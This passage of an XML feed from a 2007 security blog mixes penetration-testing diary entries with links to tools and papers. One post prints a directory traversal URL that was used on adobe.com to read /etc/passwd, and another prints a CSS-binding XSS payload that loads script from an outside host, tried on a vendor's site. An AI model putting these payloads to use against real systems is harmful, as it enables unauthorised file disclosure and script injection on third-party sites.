However, I will still keep myself abreast of the latest stuff that is going around in the security world. &lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2040571819403986663?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2040571819403986663/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2040571819403986663' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2040571819403986663'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2040571819403986663'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/have-you-download-your-scancode.html' title='Have you downloaded your scancode?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2271670493126128209</id><published>2007-09-30T12:23:00.001+08:00</published><updated>2007-09-30T12:56:30.697+08:00</updated><title type='text'>Adobe Directory Traversal???????</title><content type='html'>The other night Christ1an showed me a link on Adobe.com with directory traversal. It was an old exploit; however, it worked on Adobe. This showed how Adobe is not taking application security seriously. Well, I managed to see the entire /etc/passwd file and DAMN!! I did not take a screenshot of it. I was too careless and excited to take a screenshot. 
The following day, the issue was resolved, with reports having been made to Adobe. Well, check out the exploit here that was used against Adobe:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd"&gt;http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string I used a few nights ago.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2271670493126128209?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2271670493126128209/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2271670493126128209' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2271670493126128209'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2271670493126128209'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/adobe-directory-traversal.html' title='Adobe Directory Traversal???????'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1251306234525126832</id><published>2007-09-30T11:46:00.000+08:00</published><updated>2007-09-30T11:54:06.876+08:00</updated><title type='text'>HashMaster v0.2</title><content type='html'>Damn, RSnake just released a small yet useful program known as HashMaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing; however, I am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hash string into the form, and the program will identify the hashing algorithm used. This is rather useful, because once you know the hashing algorithm, you can then use cracking software to crack the actual passwords. Well, good work RSnake, you actually made my job easier!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ha.ckers.org/hashmaster"&gt;http://ha.ckers.org/hashmaster&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1251306234525126832?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1251306234525126832/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1251306234525126832' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1251306234525126832'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1251306234525126832'/><link rel='alternate' type='text/html' 
href='http://hackathology.blogspot.com/2007/09/hashmaster-v02.html' title='HashMaster v0.2'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2373746648972933679</id><published>2007-09-28T19:52:00.000+08:00</published><updated>2007-09-28T20:00:15.836+08:00</updated><title type='text'>Can Your Machine Be Hacked?</title><content type='html'>Last night, I received an email from Rich Mclver and he gave me a link to publish. Basically, in his post, he provides users with ideas on how to secure holes in your PC. There are 12 tests, all of which give a rough idea of how to secure your machine. Well, I would say it is a good start for those who want to start learning about security overall. Check it out:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources"&gt;http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2373746648972933679?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2373746648972933679/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2373746648972933679' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2373746648972933679'/><link rel='self' type='application/atom+xml'
href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2373746648972933679'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/can-your-machine-be-hacked.html' title='Can Your Machine Be Hacked?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7008366621600188471</id><published>2007-09-27T22:46:00.000+08:00</published><updated>2007-09-27T23:04:35.357+08:00</updated><title type='text'>Blueinfy.com</title><content type='html'>Want to know more about Web 2.0 hacking?&lt;br /&gt;Want to have free Web 2.0 auditing tools and articles?&lt;br /&gt;Want to know more about web security and hacking?&lt;br /&gt;&lt;br /&gt;You will have to check out &lt;a href="http://www.blueinfy.com"&gt;Blueinfy.com&lt;/a&gt;; it is definitely a site worth visiting, with great in-depth articles and simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj Shah, an ex-employee of Foundstone USA.
Google him and you will know how powerful he is :)&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7008366621600188471?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7008366621600188471/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7008366621600188471' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7008366621600188471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7008366621600188471'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/blueinfycom.html' title='Blueinfy.com'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6499010794721199509</id><published>2007-09-27T16:31:00.000+08:00</published><updated>2007-09-27T16:39:04.111+08:00</updated><title type='text'>XSS on a vendors website</title><content type='html'>I am still testing the application for flaws. However, it is so secure that I can't do a single thing. In the end, I ended up testing a vendor's site for XSS. The vendor did a good job of escaping &lt; and &gt; characters, and it gave me &amp;lt;SCRIPT&amp;gt;alert(2)&amp;lt;/SCRIPT&amp;gt; when I viewed the source code. I was dejected, as I knew there was something more I could do. A few minutes later, .mario was online and I told him about my problem.
Immediately, he came up with a trick that allows XSS to happen. So in the end, I entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into one of the form fields, and when I viewed the source code, it was totally injected! This was what it displayed in the source code:&lt;br /&gt;&lt;br /&gt;[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]&lt;br /&gt;&lt;br /&gt;Thank you .mario, you helped me understand XSS a lot more.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6499010794721199509?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6499010794721199509/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6499010794721199509' title='62 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6499010794721199509'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6499010794721199509'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/xss-on-vendors-website.html' title='XSS on a vendors website'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>62</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-5937148792932323083</id><published>2007-09-25T16:08:00.000+08:00</published><updated>2007-09-25T16:23:54.176+08:00</updated><title type='text'>2 Factor Authentication Update</title><content
type='html'>I don't believe this, I basically can't do a SQL injection, CSRF or XSS! Everything I wanted to do is basically either encrypted, or if I inject a simple character like ", it says service unavailable. This application can be considered very secure in terms of encryption and of a good standard if weighing it against the OWASP top ten. Even if I enter a value like 10, this value will be encrypted.&lt;br /&gt;&lt;br /&gt;I am running outta ideas, tell me what more can I do??&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-5937148792932323083?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/5937148792932323083/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=5937148792932323083' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5937148792932323083'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5937148792932323083'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/2-factor-authentication-update.html' title='2 Factor Authentication Update'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-9132072957992480592</id><published>2007-09-25T09:55:00.000+08:00</published><updated>2007-09-25T09:59:02.275+08:00</updated><title type='text'>2 Factor Authentication Day 2</title><content type='html'>Damn, it's getting tough!
Have you guys seen a 6-digit password with an encrypted string this long?&lt;br /&gt;&lt;br /&gt;ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120&lt;br /&gt;&lt;br /&gt;Well, is there nothing more I can do? I dunno, still thinking...&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-9132072957992480592?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/9132072957992480592/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=9132072957992480592' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9132072957992480592'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9132072957992480592'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/2-factor-authentication-day-2.html' title='2 Factor Authentication Day 2'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6340882716764997444</id><published>2007-09-24T20:17:00.000+08:00</published><updated>2007-09-25T07:57:09.579+08:00</updated><title type='text'>2 Factor Authentication?</title><content type='html'>Well, if you guys
asked me why I haven't been updating my blog, I can only say that there is so much to be done at work, and of course reading a lot on Rsnake's XSS Exploit and Defence. Been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.&lt;br /&gt;&lt;br /&gt;Well, back to the main topic: I had been assigned to hack an application with 2-factor authentication. Damn, all I can say is it is very secure in terms of randomness in session IDs, hidden fields and encryption. There is no way I can break the application's login page, and the only thing I found is a jar file with lotsa class files inside. Well, I know I can use a Java decompiler like jad to get the source code, but I did not because I am concentrating more on finding vulnerabilities. Hmz.... I will continue with part 2 tomorrow. Firefox is a very cool tool for web hacking. Install the following extensions, guys:&lt;br /&gt;&lt;br /&gt;1. DOM Inspector&lt;br /&gt;2. LiveHTTP Headers&lt;br /&gt;3. Tamper Data&lt;br /&gt;4. Modify Header&lt;br /&gt;5. Firebug&lt;br /&gt;6.
Greasemonkey with XSS Assistant and Post Interceptor&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6340882716764997444?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6340882716764997444/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6340882716764997444' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6340882716764997444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6340882716764997444'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/2-factor-authentication.html' title='2 Factor Authentication?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1332653559579818555</id><published>2007-09-03T15:33:00.000+08:00</published><updated>2007-09-03T15:37:38.918+08:00</updated><title type='text'>Sam, Wireless Hacking, Updates</title><content type='html'>It's been a long time since I last updated my blog. I have been so busy these days with my current job, from planning to hacking. Also, I have been reading Rsnake's and Jeremiah's book on XSS Exploit and Defence. It is a good book with great examples; however, there are some parts that I don't quite understand, and I am still trying to catch up.
Well, Sam, if you are reading this, check out the URL below for your wireless audit.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.leetupload.com/tutorials/hackingspoonfed/part1"&gt;http://www.leetupload.com/tutorials/hackingspoonfed/part1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1332653559579818555?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1332653559579818555/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1332653559579818555' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1332653559579818555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1332653559579818555'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/09/sam-wireless-hacking-updates.html' title='Sam, Wireless Hacking, Updates'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-5350627656344489340</id><published>2007-08-11T12:04:00.000+08:00</published><updated>2007-08-13T22:04:19.275+08:00</updated><title type='text'>PHP Application Firewall?</title><content type='html'>I was discussing application firewalls with Christ1an recently, and he actually presented me with an application firewall written by pdp and maintained by &lt;a href="http://mario.heideri.ch"&gt;.mario&lt;/a&gt;, which to me is very
impressive. I actually looked at the source code, and I must say that I don't understand a single shit. However, it was a nice effort from Christ1an and the guys devoting their time to develop a PHP application firewall. I am a network guy; I do web audits, but I am not good at coding or programming or source code review. Well, I am still learning. I want Christ1an on my team, as I think he will be a very good addition to the company. Hey Christ1an, if you read this, please holla at me, alright? I want to chat with you about career opportunities; you know how to reach me. Also, for guys who want a SQLi cheat sheet, check these out:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ha.ckers.org/sqlinjection"&gt;http://ha.ckers.org/sqlinjection&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ferruh.mavituna.com/makale/sql-injection-cheatsheet"&gt;http://ferruh.mavituna.com/makale/sql-injection-cheatsheet&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Check out the PHPIDS Team's IDS and their XSS database:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://php-ids.org"&gt;http://php-ids.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.gnucitizen.org/xssdb/application.htm"&gt;http://www.gnucitizen.org/xssdb/application.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-5350627656344489340?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/5350627656344489340/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=5350627656344489340' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5350627656344489340'/><link rel='self' type='application/atom+xml'
href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5350627656344489340'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/08/php-application-firewall.html' title='PHP Application Firewall?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2920296619647034278</id><published>2007-08-09T12:10:00.000+08:00</published><updated>2007-08-09T12:22:29.629+08:00</updated><title type='text'>Cisco IOS 12.3T onwards with Tool Command Language</title><content type='html'>I was again reading the ioshints blog for Cisco tricks. I must say he is the master of Cisco products and configuration. I was reading about tclsh, and I must say it is very handy, as I can write scripts and store them remotely, in NVRAM or in flash.
Well, below are a few links where you can learn the basics of tclsh scripting.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ioshints.blogspot.com/2007/05/ios-tclsh-resources.html"&gt;http://ioshints.blogspot.com/2007/05/ios-tclsh-resources.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ioshints.blogspot.com/2007/08/example-tcl-script-with-command-line.html"&gt;http://ioshints.blogspot.com/2007/08/example-tcl-script-with-command-line.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2920296619647034278?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2920296619647034278/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2920296619647034278' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2920296619647034278'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2920296619647034278'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/08/cisco-ios-123t-onwards-with-tool.html' title='Cisco IOS 12.3T onwards with Tool Command Language'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3469713031703079406</id><published>2007-08-07T21:27:00.000+08:00</published><updated>2007-08-07T21:41:44.116+08:00</updated><title type='text'>Exploiting FTP clients using PASV command</title><content type='html'>Finally, I am back home in Singapore again. I am so happy, and my mood is starting to brighten again. I was researching web security and I came across Wade Alcorn's website. He found out that it was possible to launch a reverse shell and own an Asterisk server using inter-protocol exploitation. Also, check out BeEF, which is the equivalent of a Metasploit-type framework for web applications. Lastly, do check out the FTP PASV command manipulation, which allows FTP servers to cause vulnerable FTP clients to connect to other hosts.&lt;br /&gt;&lt;br /&gt;"The paper discusses the FTP client flaw in detail and demonstrates how it can be used to attack common web browsers such as Konqueror, Opera and Firefox. Proof of concept code is presented that extends existing JavaScript port-scanning techniques to scan any TCP port from Firefox (even though it now implements "port banning" restrictions)."&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.bindshell.net/papers/ftppasv"&gt;http://www.bindshell.net/papers/ftppasv&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3469713031703079406?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3469713031703079406/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3469713031703079406' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3469713031703079406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3469713031703079406'/><link rel='alternate' type='text/html'
href='http://hackathology.blogspot.com/2007/08/exploiting-ftp-clients-using-pasv.html' title='Exploiting FTP clients using PASV command'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-693248285474819814</id><published>2007-08-05T18:13:00.000+08:00</published><updated>2007-08-05T18:22:49.708+08:00</updated><title type='text'>Michael Lynn Cisco IOS reverse shell exposed?</title><content type='html'>I was reading articles and looking at how &lt;a href="http://en.wikipedia.org/wiki/Michael_Lynn"&gt;Michael Lynn's&lt;/a&gt; exploit from Black Hat 2005 works. Nothing can be found, as the code was not leaked out, nor does anyone know much about the actual exploit. I was determined, and I found something that relates to heap overflows in Cisco IOS. I think it's something similar to Michael Lynn's exploit using the IOS check_heaps() function.
For more, check it out here: &lt;a href="http://www.irmplc.com/content/pdfs/Cisco_IOS_Exploitation_Techniques.pdf"&gt;http://www.irmplc.com/content/pdfs/Cisco_IOS_Exploitation_Techniques.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-693248285474819814?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/693248285474819814/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=693248285474819814' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/693248285474819814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/693248285474819814'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/08/micheal-lynn-cisco-ios-reverse-shell.html' title='Michael Lynn Cisco IOS reverse shell exposed?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7069311555582709382</id><published>2007-08-05T12:48:00.000+08:00</published><updated>2007-08-05T13:06:09.849+08:00</updated><title type='text'>Attribute-Based XSS and Verifying if your webmail account is Hacked!</title><content type='html'>These days, I am just plain lazy. Maybe it is due to the mood that I am going back to Singapore, or maybe I am just depressed with certain issues here. But whatever it is, I am still doing a lot of research and penetration testing work.
It's been a long time since I last visited Jeremiah's blog. Today, I just went through his blog and discovered two interesting topics that caught my eye. One is a new XSS vector known as &lt;a href="http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html#links"&gt;Attribute-Based Cross-Site Scripting&lt;/a&gt;, and the other is &lt;a href="http://jeremiahgrossman.blogspot.com/2007/07/how-to-check-if-your-webmail-account.html#links"&gt;How to check if your WebMail account has been hacked (Redux)&lt;/a&gt;. Check it out at &lt;a href="http://jeremiahgrossman.blogspot.com"&gt;http://jeremiahgrossman.blogspot.com&lt;/a&gt;. He described a way to find out whether a hacker has hacked into your webmail, how the new XSS vector works and how to prevent it. It is an absolute must-read for all webappsec ppl.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7069311555582709382?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7069311555582709382/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7069311555582709382' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7069311555582709382'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7069311555582709382'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/08/attribute-based-xss-and-verifying-if.html' title='Attribute-Based XSS and Verifying if your webmail account is Hacked!'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image
